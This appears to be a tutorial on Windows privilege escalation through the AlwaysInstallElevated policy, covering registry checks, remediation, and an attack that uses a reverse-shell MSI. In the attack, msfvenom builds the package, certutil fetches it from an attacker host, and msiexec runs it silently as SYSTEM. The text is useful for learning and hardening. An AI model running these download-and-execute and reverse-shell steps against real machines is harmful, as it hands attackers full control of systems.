Windows Privilege Escalation – AlwaysInstallElevated Policy
Introduction
The Windows Installer is the operating system component that installs software packaged as MSI files; its service runs as NT AUTHORITY\SYSTEM. AlwaysInstallElevated is a Windows policy that makes the installer run every MSI package with SYSTEM level permissions, regardless of which user started the installation. Because any user can author an MSI package, an unprivileged user can exploit the policy to gain full administrative control over the machine.
Enabling this option is equivalent to granting every user full SYSTEM rights, which is a severe security risk. Microsoft strongly discourages the use of this setting.
The Attack
If a machine has the AlwaysInstallElevated policy enabled, an attacker can craft a malicious .msi package whose install actions launch arbitrary code; the Windows Installer service then runs those actions with SYSTEM level privileges, so the attacker's code executes as SYSTEM.
For this attack to work, the AlwaysInstallElevated value (a REG_DWORD) must be set to 1 in both of the following registry keys; a value of 1 in only one of them is not enough:
- HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
- HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
Example
The first step is to check whether the required registry value is set to 1 in both hives. If reg query reports that it was unable to find the specified registry key or value, the policy is simply not configured in that hive:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
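The same check, written as an added PowerShell example (this is not code from the original article). It reads the value from both hives, treats a missing key or value name as "not set" instead of erroring out, and only reports the host as exploitable when both hives hold exactly 1, which is the condition the attack depends on:

```powershell
# Added example, not from the original article: check whether the
# AlwaysInstallElevated policy is fully enabled by reading both hives.
# The policy is only effective when BOTH values are 1; a missing key,
# a missing value name, or a 0 in either hive means it is not active.
function Test-AlwaysInstallElevated {
    [CmdletBinding()]
    param()

    # The policy path is identical under each hive; only the hive differs.
    $paths = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )

    $values = [ordered]@{}
    foreach ($path in $paths) {
        $hive = $path.Split(':')[0]
        # Get-ItemProperty errors when the key or the value name is absent;
        # SilentlyContinue turns that into $null, which we record as "not set".
        $item = Get-ItemProperty -Path $path -Name 'AlwaysInstallElevated' `
                                 -ErrorAction SilentlyContinue
        if ($null -eq $item -or $null -eq $item.AlwaysInstallElevated) {
            $values[$hive] = 'not set'
        } else {
            $values[$hive] = [int]$item.AlwaysInstallElevated
        }
    }

    [pscustomobject]@{
        HKLM       = $values['HKLM']
        HKCU       = $values['HKCU']
        # Exploitable only when both hives are set to exactly 1.
        Vulnerable = ($values['HKLM'] -eq 1) -and ($values['HKCU'] -eq 1)
    }
}

Test-AlwaysInstallElevated
```

Running it from the low-privileged user's own session matters: the HKCU value is read from that user's hive, so a result obtained from another account does not tell you whether the attack will work for this one.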
This can also be checked with automated scripts such as WinPEAS:
winpeas.exe quiet systeminfo
For this example, a reverse shell can be generated using MSFvenom, with the following flags:
- -p to specify the payload type, in this case the Windows reverse TCP shell
- LHOST to specify the local host IP address to connect to
- LPORT to specify the local port to connect to
- -f to specify the format, in this case msi
The resulting shell.msi file is then transferred to the Windows victim machine, for example by serving it from a Python web server on the attacker host and downloading it with the Windows Certutil utility on the victim.
The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
The following command can then be used to install the shell.msi file on the victim:
msiexec /quiet /qn /i shell.msi
The flags used are for the following:
- /quiet – quiet mode, which means there’s no user interaction required
- /qn – specifies there’s no UI during the installation process
- /i – specifies a normal installation of the given package
Once the package is installed, the malicious code is executed, granting SYSTEM level access to the system through a reverse shell.
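The victim-side half of the procedure above (download, install, check the result) as an added PowerShell example; it is not code from the original article. On the attacker host it assumes the package was built with msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o shell.msi, is served with python3 -m http.server 80, and that a listener is running with nc -lvnp 4444. The attacker address 10.10.14.5, the port, and the file name are assumptions chosen for this example. Launching msiexec through Start-Process -Wait is the one change from the page's bare command: it makes the installer's exit code available, which a direct msiexec call from PowerShell does not, because msiexec returns to the shell immediately.

```powershell
# Added example, not from the original article. Victim-side steps:
# fetch the MSI from the attacker's web server and run it through msiexec.
# 10.10.14.5, port 80 and shell.msi are assumed values for this example.
$attackerUrl = 'http://10.10.14.5/shell.msi'
$msiPath     = Join-Path $env:TEMP 'shell.msi'

# certutil is used as the download tool, as on the page:
# -urlcache -split -f fetches the URL and writes it to the given file.
certutil.exe -urlcache -split -f $attackerUrl $msiPath | Out-Null
if (-not (Test-Path $msiPath)) {
    throw "Download of $attackerUrl failed"
}

# /i normal install, /quiet /qn no interaction and no UI.
# -Wait -PassThru returns the process object so the exit code can be read.
$proc = Start-Process -FilePath 'msiexec.exe' `
    -ArgumentList "/quiet /qn /i `"$msiPath`"" -Wait -PassThru

switch ($proc.ExitCode) {
    0    { 'msiexec reported success; the payload ran as SYSTEM.' }
    1619 { 'msiexec could not open the package; check the path and the download.' }
    default {
        # A non-zero code does not prove the payload did not run: the
        # custom action may already have spawned the shell before the
        # installer reported an error, so always check the listener.
        "msiexec exited with code $($proc.ExitCode); check the Netcat listener."
    }
}
```

Whatever the exit code, the proof of success is the connection arriving at the listener, and whoami in that shell should report nt authority\system.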
Metasploit Exploitation
This vulnerability can also be exploited with the Metasploit module exploit/windows/local/always_install_elevated.
Once a Meterpreter shell is obtained, all that is required is to background the session, search for the module and select it by its full path, set the SESSION option to the ID of the backgrounded session, and run it:
This grants a SYSTEM level shell. Always try to perform the attack manually first, especially when practicing it for the first time, so that the registry check and the msiexec step are understood before relying on the module.
Conclusion
Because this policy permits users to install applications that require access to restricted directories and registry keys, system administrators should consider whether it provides users with an appropriate level of security; in practice it hands every local user a path to SYSTEM.
When the policy is not set, applications are instead installed using the installing user’s privileges, and only managed applications (those assigned or published through Group Policy) are installed with elevated privileges.
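Turning the policy off on a machine where it was set by hand, as an added PowerShell example that is not code from the original article. It writes an explicit 0 to both hives and reads the values back. Run it from an elevated prompt; note that the HKCU write only affects the hive of the account running the script, so where the policy was deployed by Group Policy it should instead be set to Disabled in both Computer Configuration and User Configuration under Administrative Templates > Windows Components > Windows Installer > Always install with elevated privileges, which is assumed here to be the organisation's normal channel.

```powershell
# Added example, not from the original article: disable AlwaysInstallElevated
# in both hives and verify the result. Requires an elevated prompt for HKLM.
function Disable-AlwaysInstallElevated {
    $paths = @(
        'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
        'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    )

    foreach ($path in $paths) {
        # Create the policy key if it is absent so that an explicit 0 is
        # recorded, mirroring the Group Policy "Disabled" state.
        if (-not (Test-Path $path)) {
            New-Item -Path $path -Force | Out-Null
        }
        Set-ItemProperty -Path $path -Name 'AlwaysInstallElevated' `
                         -Value 0 -Type DWord
    }

    # Read back so the change is confirmed rather than assumed.
    foreach ($path in $paths) {
        $v = (Get-ItemProperty -Path $path -Name 'AlwaysInstallElevated').AlwaysInstallElevated
        '{0}: AlwaysInstallElevated = {1}' -f $path, $v
    }
}

Disable-AlwaysInstallElevated
```

After the change, re-run the reg query commands from the example section as the low-privileged user: both should now return 0, and a subsequent msiexec run of the malicious package will no longer execute its payload as SYSTEM.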